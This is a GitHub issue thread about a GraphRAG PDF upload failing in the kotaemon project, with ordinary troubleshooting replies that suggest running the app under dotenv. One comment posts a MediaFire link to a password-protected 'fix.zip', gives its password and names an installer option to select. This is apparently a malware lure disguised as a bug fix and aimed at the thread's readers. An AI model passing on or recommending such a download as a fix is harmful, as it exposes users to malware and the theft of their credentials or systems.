### ISSUE TITLE
[BUG] - <title>GraphRAG Upload Progress failed

### ISSUE THREAD

**Issue by Lbaiall** [Cinnamon/kotaemon#146]
### Description

when i upload my own pdf data ,it during erro in  create_base_entity_graph ,i  don't know why it happen ,someone has the same problem ？
![image](https://github.com/user-attachments/assets/aec25920-ba8a-4250-979d-bee4b251d17a)
![image](https://github.com/user-attachments/assets/6ca22001-784b-4a45-abde-7362de04dd18)

### Reproduction steps

```bash
1. Go to '...'
2. Click on '....'
3. Scroll down to '....'
4. See error
```

**Comment by taprosoft** [comment]
Please check similar issue https://github.com/Cinnamon/kotaemon/issues/140.

**Comment by Lbaiall** [comment]
@taprosoft thks for provide infor ，i solved it with command line ：dotenv run -- python app.py

**Comment by marcelo-antonio-nunes** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by eyangs** [comment]
I have tried command line：dotenv run -- python app.py， but it doesn't work！
